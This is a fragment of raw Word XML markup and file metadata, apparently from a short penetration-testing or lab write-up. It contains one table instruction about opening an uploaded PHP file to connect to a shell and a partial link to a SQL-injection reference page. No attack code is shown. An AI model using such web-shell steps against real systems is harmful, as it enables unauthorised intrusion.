                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Open the location the php file is saved to and connect to shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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AU" w:eastAsia="zh-CN" w:bidi="hi-IN"/>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ook.hacktricks.xyz/pentesting-web/sql-injectio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280</TotalTime>
  <Application>LibreOffice/7.3.7.2$Linux_X86_64 LibreOffice_project/30$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>3</Pages>
  <Words>509</Words>
  <Characters>2723</Characters>
  <CharactersWithSpaces>3109</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2023-09-11T11:29:06Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-AU</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-06T12:00:57Z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